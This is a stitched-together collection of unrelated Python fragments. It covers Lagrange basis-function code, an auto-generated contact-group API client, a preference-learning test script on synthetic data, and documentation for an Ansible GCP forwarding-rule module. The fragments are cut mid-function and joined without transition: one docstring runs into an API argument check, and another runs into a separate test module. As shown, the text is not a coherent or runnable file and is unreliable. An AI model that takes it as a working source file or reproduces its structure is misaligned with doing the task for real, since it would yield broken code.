First derivative for the linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
W = numpy.ones((x.shape[0], 2))
W[:, 0] -= 2
return numpy.array([W])
def L1d1d1(x):
"""
Second derivative for the linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
return numpy.zeros((x.shape[0], 2))
def L2(x):
"""
Quadratic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 3)
"""
L1, L2 = 1-x, x
Phi = numpy.array([
L1 * (2.0 * L1 - 1),
4.0 * L1 * L2,
L2 * (2.0 * L2 - 1)])
return Phi.T
def L2d1(x):
"""
First derivative of the quadratic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 3)
"""
L1 = 1-x
return numpy.array([
1.0 - 4.0 * L1,
4.0 * L1 - 4.0 * x,
4.0 * x - 1.]).T
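# (added check) At x = 0.5 the quadratic weights L2(0.5) are [0, 1, 0] and
# the derivative weights L2d1(0.5) are [-1, 0, 1], as expected at the
# midpoint node of the quadratic element.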
# .. todo: L2dxdx
def L3(x):
"""
Cubic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 4)
"""
L1, L2 = 1-x, x
sc = 9./2.
return numpy.array([
0.5*L1*(3*L1-1)*(3*L1-2),
sc*L1*L2*(3*L1-1),
sc*L1*L2*(3*L2-1),
0.5*L2*(3*L2-1)*(3*L2-2)]).T
def L3d1(x):
"""
First derivative of the cubic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 4)
"""
L1 = x*x
return numpy.array([
-(27.*L1-36.*x+11.)/2.,
(81.*L1-90.*x+18.)/2.,
-(81.*L1-72.*x+9.)/2.,
(27.*L1-18.*x+2.)/2.]).T
# .. todo: L3dxdx
def L4(x):
"""
Quartic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 5)
"""
sc = 1/3.
x2 = x*x
x3 = x2*x
x4 = x3*x
return numpy.array([
sc*(32*x4-80*x3+70*x2-25*x+3),
sc*(-128*x4+288*x3-208*x2+48*x),
sc*(192*x4-384*x3+228*x2-36*x),
sc*(-128*x4+224*x3-112*x2+16*x),
sc*(32*x4-48*x3+22*x2-3*x)]).T
def L4d1(x):
"""
First derivative of the quartic lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array(npoints, 5)
"""
sc = 1/3.
x2 = x*x
x3 = x2*x
return numpy.array([ \
sc*(128*x3-240*x2+140*x-25), \
sc*(-512*x3+864*x2-416*x+48), \
sc*(768*x3-1152*x2+456*x-36), \
sc*(-512*x3+672*x2-224*x+16), \
sc*(128*x3-144*x2+44*x-3)]).T
# .. todo: L4d2
# Hermite basis functions
def H3(x):
"""
Cubic-Hermite basis function.
delete_group" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `delete_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/{groupId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_groups(self, **kwargs): # noqa: E501
"""Get all Contact Groups in paginated format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_groups(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PageGroupProjection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_groups_with_http_info(**kwargs) # noqa: E501
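    # (added sketch) Typical use, assuming `api` is an instance of this
    # generated API class built from a configured ApiClient (illustrative only):
    #   page = api.get_all_groups(page=0, size=20, sort='ASC')
    #   thread = api.get_all_groups(async_req=True); page = thread.get()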
def get_all_groups_with_http_info(self, **kwargs): # noqa: E501
"""Get all Contact Groups in paginated format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_groups_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PageGroupProjection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'before',
'page',
'since',
'size',
'sort'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_groups" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'before' in local_var_params and local_var_params['before'] is not None: # noqa: E501
query_params.append(('before', local_var_params['before'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'since' in local_var_params and local_var_params['since'] is not None: # noqa: E501
query_params.append(('since', local_var_params['since'])) # noqa: E501
if 'size' in local_var_params and local_var_params['size'] is not None: # noqa: E501
query_params.append(('size', local_var_params['size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/paginated', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageGroupProjection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_group(self, group_id, **kwargs): # noqa: E501
"""Get group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GroupDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_group_with_http_info(group_id, **kwargs) # noqa: E501
def get_group_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Get group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GroupDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'group_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `get_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['groupId'] = local_var_params['group_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/groups/{groupId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_group_with_contacts(self, group_id, **kwargs): # noqa: E501
"""Get group and contacts belonging to it # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_contacts(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GroupContactsDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_group_with_contacts_with_http_info(group_id, **kwargs) # noqa: E501
def get_group_with_contacts_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Get group and contacts belonging to it # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_contacts_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GroupContactsDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
'''
Test the preference_features module with some simple synthetic data.
Created on 3 Mar 2017
@author: edwin
'''
import logging
import os
import sys
from gp_pref_learning import GPPrefLearning
logging.basicConfig(level=logging.DEBUG)
sys.path.append("./python")
sys.path.append("./python/analysis")
sys.path.append("./python/models")
sys.path.append("./python/analysis/lukin_comparison")
import numpy as np
from gp_classifier_vb import matern_3_2_from_raw_vals
from scipy.stats import multivariate_normal as mvn, norm, bernoulli, kendalltau
from scipy.linalg import block_diag
from collab_pref_learning_vb import CollabPrefLearningVB
from collab_pref_learning_svi import CollabPrefLearningSVI
from sklearn.metrics import f1_score, roc_auc_score
def evaluate_models_personal(model, item_features, person_features, F,
pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points,
pair1idxs_test, pair2idxs_test, personidxs_test, test_points):
'''
Test performance in predicting the ground truth or common mean preference function
from multi-user labels.
'''
model.fit(
personidxs_tr,
pair1idxs_tr,
pair2idxs_tr,
item_features,
prefs_tr,
person_features,
optimize=False,
use_median_ls=True
)
#print(("Final lower bound: %f" % model.lowerbound()))
# Predict at all locations
Fpred = model.predict_f(item_features, person_features)
tau_obs = kendalltau(F[train_points], Fpred[train_points])[0]
print("Kendall's tau (observations): %.3f" % tau_obs)
# Evaluate the accuracy of the predictions
# print("RMSE of %f" % np.sqrt(np.mean((f-fpred)**2))
# print("NLPD of %f" % -np.sum(norm.logpdf(f, loc=fpred, scale=vpred**0.5))
tau_test = kendalltau(F[test_points], Fpred[test_points])[0]
print("Kendall's tau (test): %.3f" % tau_test)
# noise rate in the pairwise data -- how many of the training pairs conflict with the ordering suggested by f?
prefs_tr_noisefree = (F[pair1idxs_tr, personidxs_tr] > F[pair2idxs_tr, personidxs_tr]).astype(float)
noise_rate = 1.0 - np.mean(prefs_tr == prefs_tr_noisefree)
print('Noise rate in the pairwise training labels: %f' % noise_rate)
t = (F[pair1idxs_test, personidxs_test] > F[pair2idxs_test, personidxs_test]).astype(int)
if np.unique(t).shape[0] == 1:
idxs_to_flip = np.random.choice(len(pair1idxs_test), int(0.5 * len(pair1idxs_test)), replace=False)
tmp = pair1idxs_test[idxs_to_flip]
pair1idxs_test[idxs_to_flip] = pair2idxs_test[idxs_to_flip]
pair2idxs_test[idxs_to_flip] = tmp
t[idxs_to_flip] = 1 - t[idxs_to_flip]
rho_pred = model.predict(personidxs_test, pair1idxs_test, pair2idxs_test, item_features, person_features)
rho_pred = rho_pred.flatten()
t_pred = np.round(rho_pred)
brier = np.sqrt(np.mean((t - rho_pred) ** 2))
print("Brier score of %.3f" % brier)
rho_pred[rho_pred < 1e-5] = 1e-5
rho_pred[rho_pred > 1-1e-5] = 1-1e-5
cee = -np.mean(t * np.log(rho_pred) + (1 - t) * np.log(1 - rho_pred))
print("Cross entropy error of %.3f" % cee)
f1 = f1_score(t, t_pred)
print("F1 score of %.3f" % f1)
acc = np.mean(t == t_pred)
print("Accuracy of %.3f" % acc)
roc = roc_auc_score(t, rho_pred)
print("ROC of %.3f" % roc)
return noise_rate, tau_obs, tau_test, brier, cee, f1, acc, roc
def evaluate_models_common_mean(model, item_features, person_features, f,
pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points,
pair1idxs_test, pair2idxs_test, test_points):
'''
Test performance in predicting the ground truth or common mean preference function
from multi-user labels.
'''
model.fit(
personidxs_tr,
pair1idxs_tr,
pair2idxs_tr,
item_features,
prefs_tr,
person_features,
optimize=False,
use_median_ls=True
)
#print(("Final lower bound: %f" % model.lowerbound()))
# Predict at all locations
fpred = model.predict_t(item_features)
tau_obs = kendalltau(f[train_points], fpred[train_points])[0]
print("Kendall's tau (observations): %.3f" % tau_obs)
# Evaluate the accuracy of the predictions
# print("RMSE of %f" % np.sqrt(np.mean((f-fpred)**2))
# print("NLPD of %f" % -np.sum(norm.logpdf(f, loc=fpred, scale=vpred**0.5))
tau_test = kendalltau(f[test_points], fpred[test_points])[0]
print("Kendall's tau (test): %.3f" % tau_test)
# noise rate in the pairwise data -- how many of the training pairs conflict with the ordering suggested by f?
prefs_tr_noisefree = (f[pair1idxs_tr] > f[pair2idxs_tr]).astype(float)
noise_rate = 1.0 - np.mean(prefs_tr == prefs_tr_noisefree)
print('Noise rate in the pairwise training labels: %f' % noise_rate)
t = (f[pair1idxs_test] > f[pair2idxs_test]).astype(int)
if np.unique(t).shape[0] == 1:
idxs_to_flip = np.random.choice(len(pair1idxs_test), int(0.5 * len(pair1idxs_test)), replace=False)
tmp = pair1idxs_test[idxs_to_flip]
pair1idxs_test[idxs_to_flip] = pair2idxs_test[idxs_to_flip]
pair2idxs_test[idxs_to_flip] = tmp
t[idxs_to_flip] = 1 - t[idxs_to_flip]
rho_pred = model.predict_common(item_features, pair1idxs_test, pair2idxs_test)
rho_pred = rho_pred.flatten()
t_pred = np.round(rho_pred)
brier = np.sqrt(np.mean((t - rho_pred) ** 2))
print("Brier score of %.3f" % brier)
rho_pred[rho_pred < 1e-5] = 1e-5
rho_pred[rho_pred > 1-1e-5] = 1-1e-5
cee = -np.mean(t * np.log(rho_pred) + (1 - t) * np.log(1 - rho_pred))
print("Cross entropy error of %.3f" % cee)
f1 = f1_score(t, t_pred)
print("F1 score of %.3f" % f1)
acc = np.mean(t == t_pred)
print("Accuracy of %.3f" % acc)
roc = roc_auc_score(t, rho_pred)
print("ROC of %.3f" % roc)
return noise_rate, tau_obs, tau_test, brier, cee, f1, acc, roc
def split_dataset(N, F, pair1idxs, pair2idxs, personidxs, prefs):
# test set size
test_size = 0.5
# select some data points as test only
Ntest = int(np.ceil(test_size * N))
if Ntest < 2: Ntest = 2 # need to have at least one pair!
test_points = np.random.choice(N, Ntest, replace=False)
test_points = np.in1d(np.arange(N), test_points)
train_points = np.invert(test_points)
Ftrain = F[train_points]
Ftest = F[test_points]
train_pairs = train_points[pair1idxs] & train_points[pair2idxs]
Ptrain = np.sum(train_pairs)
pair1idxs_tr = pair1idxs[train_pairs]
pair2idxs_tr = pair2idxs[train_pairs]
prefs_tr = prefs[train_pairs]
personidxs_tr = personidxs[train_pairs]
test_pairs = test_points[pair1idxs] & test_points[pair2idxs]
Ptest = np.sum(test_pairs)
pair1idxs_test = pair1idxs[test_pairs]
pair2idxs_test = pair2idxs[test_pairs]
prefs_test = prefs[test_pairs]
personidxs_test = personidxs[test_pairs]
# some pairs with one train and one test item will be discarded
print("No. training pairs: %i" % Ptrain)
print("No. test pairs: %i" % Ptest)
return Ftrain, pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points, Ftest, \
pair1idxs_test, pair2idxs_test, personidxs_test, prefs_test, test_points
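# (added note) split_dataset splits the items, not the pairs: only pairs whose
# two items land on the same side of the item split are kept, so pairs that
# straddle the train/test boundary are discarded (the printed pair counts can
# therefore sum to less than the original P).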
def gen_synthetic_personal_prefs(Nfactors, nx, ny, N, Npeople, P, ls, sigma, s, lsy, Npeoplefeatures=4):
if N > nx * ny:
N = nx * ny # can't have more locations than there are grid squares (only using discrete values here)
# Some random feature values
xvals = np.random.choice(nx, N, replace=True)[:, np.newaxis]
yvals = np.random.choice(ny, N, replace=True)[:, np.newaxis]
# remove repeated coordinates
for coord in range(N):
while np.sum((xvals == xvals[coord]) & (yvals == yvals[coord])) > 1:
xvals[coord] = np.random.choice(nx, 1)
yvals[coord] = np.random.choice(ny, 1)
Kt = matern_3_2_from_raw_vals(np.concatenate((xvals.astype(float), yvals.astype(float)), axis=1), ls)
t = mvn.rvs(cov=Kt/sigma).reshape(nx * ny, 1)
# Kw = [Kt for _ in range(Nfactors)]
# Kw = block_diag(*Kw)
# w = mvn.rvs(cov=Kw/s).reshape(Nfactors, nx * ny).T
w = np.empty((nx*ny, Nfactors))
for f in range(Nfactors):
if np.isscalar(s):
w[:, f] = mvn.rvs(cov=Kt/s)
else:
w[:, f] = mvn.rvs(cov=Kt / s[f])
# person_features = None
person_features = np.zeros((Npeople, Npeoplefeatures))
for i in range(Npeoplefeatures):
person_features[:, i] = np.random.choice(10, Npeople, replace=True)
person_features += np.random.rand(Npeople, Npeoplefeatures) * 0.01
Ky = matern_3_2_from_raw_vals(person_features, lsy)
# Ky = [Ky for _ in range(Nfactors)]
# Ky = block_diag(*Ky)
# y = mvn.rvs(cov=Ky).reshape(Nfactors, Npeople)
y = np.empty((Nfactors, Npeople))
for f in range(Nfactors):
y[f] = mvn.rvs(cov=Ky)
f_all = w.dot(y) + t
# divide P between people
personidxs = np.random.choice(Npeople, P, replace=True)
# generate pairs indices
pair1idxs = np.random.choice(N, P, replace=True)
pair2idxs = np.random.choice(N, P, replace=True)
# remove indexes of pairs that compare the same data points -- the correct answer is trivial
while np.any(pair1idxs == pair2idxs):
matchingidxs = pair1idxs==pair2idxs
pair2idxs[matchingidxs] = np.random.choice(N, np.sum(matchingidxs), replace=True)
# generate the discrete labels from the noisy preferences
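# probit link: P(item 1 preferred) = Phi((f_1 - f_2) / sqrt(2)); the sqrt(2) matches the difference of two unit-variance noise terms on the latent utilities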
g_f = (f_all[pair1idxs, personidxs] - f_all[pair2idxs, personidxs]) / np.sqrt(2)
phi = norm.cdf(g_f)
prefs = bernoulli.rvs(phi)
item_features = np.concatenate((xvals, yvals), axis=1)
return prefs, item_features, person_features, pair1idxs, pair2idxs, personidxs, f_all, w, t.flatten(), y
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
fix_seeds = True
do_profiling = False
if do_profiling:
import cProfile, pstats, io
pr = cProfile.Profile()
pr.enable()
# make sure the simulation is repeatable
if fix_seeds:
np.random.seed(11)
logging.info( "Testing Bayesian preference components analysis using synthetic data..." )
if 'item_features' not in globals():
# Npeople = 20
# N = 25
# P = 100 # pairs per person in test+training set
# nx = 5
# ny = 5
Npeople = 8
N = 16
P = 5000
nx = 4
ny = 4
Npeoplefeatures = 3
ls = [10, 5]
s = 0.1
sigma = 0.1
lsy = 2 + np.zeros(Npeoplefeatures)
Nfactors = 2
prefs, item_features, person_features, pair1idxs, pair2idxs, personids, latent_f, w, t, y = \
gen_synthetic_personal_prefs(Nfactors, nx, ny, N, Npeople, P, ls, sigma, s, lsy, Npeoplefeatures)
# return t as a grid
t = t.reshape(nx, ny)
Ptest_percent = 0.2
Ptest = int(Ptest_percent * pair1idxs.size)
testpairs = np.random.choice(pair1idxs.shape[0], Ptest, replace=False)
testidxs = np.zeros(pair1idxs.shape[0], dtype=bool)
testidxs[testpairs] = True
trainidxs = np.invert(testidxs)
# if fix_seeds:
# np.random.seed() # do this if we want to use a different seed each time to test the variation in results
# Model initialisation --------------------------------------------------------------------------------------------
if len(sys.argv) > 1:
use_svi = sys.argv[1] == 'svi'
else:
use_svi = True
use_t = True
use_person_features = True
optimize = False
ls_initial = np.array(ls)# + np.random.rand(len(ls)) * 10)
print(("Initial guess of length scale for items: %s, true length scale is %s" % (ls_initial, ls)))
lsy_initial = np.array(lsy)# + np.random.rand(len(lsy)) * 10)# + 7
print(("Initial guess of length scale for people: %s, true length scale is %s" % (lsy_initial, lsy)))
if use_svi:
model = CollabPrefLearningSVI(2, Npeoplefeatures if use_person_features else 0, ls=ls_initial,
lsy=lsy_initial, use_common_mean_t=use_t,
nfactors=5, ninducing=7, max_update_size=200, delay=25,
# Source repository: usegalaxy-no/usegalaxy
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_forwarding_rule_info
description:
- Gather info for GCP ForwardingRule
short_description: Gather info for GCP ForwardingRule
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters).
- Each additional filter in the list will be added as an AND condition (filter1
and filter2).
type: list
elements: str
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
required: true
type: str
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
elements: str
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- For authentication, you can set service_account_file using the C(GCP_SERVICE_ACCOUNT_FILE)
env variable.
- For authentication, you can set service_account_contents using the C(GCP_SERVICE_ACCOUNT_CONTENTS)
env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variables values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: get info on a forwarding rule
gcp_compute_forwarding_rule_info:
region: us-west1
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
resources:
description: List of resources
returned: always
type: complex
contains:
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
isMirroringCollector:
description:
- Indicates whether or not this load balancer can be used as a collector for
packet mirroring. To prevent mirroring loops, instances behind this load balancer
will not have their traffic mirrored even if a PacketMirroring rule applies
to them. This can only be set to true for load balancers that have their loadBalancingScheme
set to INTERNAL.
returned: success
type: bool
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource.
returned: success
type: int
IPAddress:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the
address must be a global IP, and for regional forwarding rules, the address
must live in the same region as the forwarding rule. If this field is empty,
an ephemeral IPv4 address from the same scope (global or regional) will be
assigned. A regional forwarding rule supports IPv4 only. A global forwarding
rule supports either IPv4 or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP
address belonging to the network/subnet configured for the forwarding rule.
By default, if this field is empty, an ephemeral internal IP address will
be automatically allocated from the IP range of the subnet or network configured
for this forwarding rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 172.16.17.32
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
returned: success
type: str
IPProtocol:
description:
- The IP protocol to which this rule applies.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
returned: success
type: str
backendService:
description:
- A BackendService to receive the matched traffic. This is used only for INTERNAL
load balancing.
returned: success
type: dict
loadBalancingScheme:
description:
- This signifies what the ForwardingRule will be used for and can be EXTERNAL,
INTERNAL, or INTERNAL_MANAGED. EXTERNAL is used for Classic Cloud VPN gateways,
protocol forwarding to VMs from an external IP address, and HTTP(S), SSL Proxy,
TCP Proxy, and Network TCP/UDP load balancers.
- INTERNAL is used for protocol forwarding to VMs from an internal IP address,
and internal TCP/UDP load balancers.
- INTERNAL_MANAGED is used for internal HTTP(S) load balancers.
returned: success
type: str
name:
description:
- Name of the resource; provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
network:
description:
- For internal load balancing, this field identifies the network that the load
balanced IP should belong to for this Forwarding Rule. If this field is not
specified, the default network will be used.
- This field is only used for INTERNAL load balancing.
returned: success
type: dict
portRange:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP; only packets addressed
to ports in the specified range will be forwarded to the target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports:
* TargetHttpProxy: 80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25,
43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy:
25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway:
500, 4500 .'
returned: success
type: str
ports:
description:
- This field is used along with the backend_service field for internal load
balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will
be forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
returned: success
type: list
subnetwork:
description:
- The subnetwork that the load balanced IP should belong to for this Forwarding
Rule. This field is only used for INTERNAL load balancing.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
returned: success
type: dict
target:
description:
- The URL of the target resource to receive the matched traffic.
- The target must live in the same region as the forwarding rule.
- The forwarded traffic must be of a type
marking_definition_instance["id"])
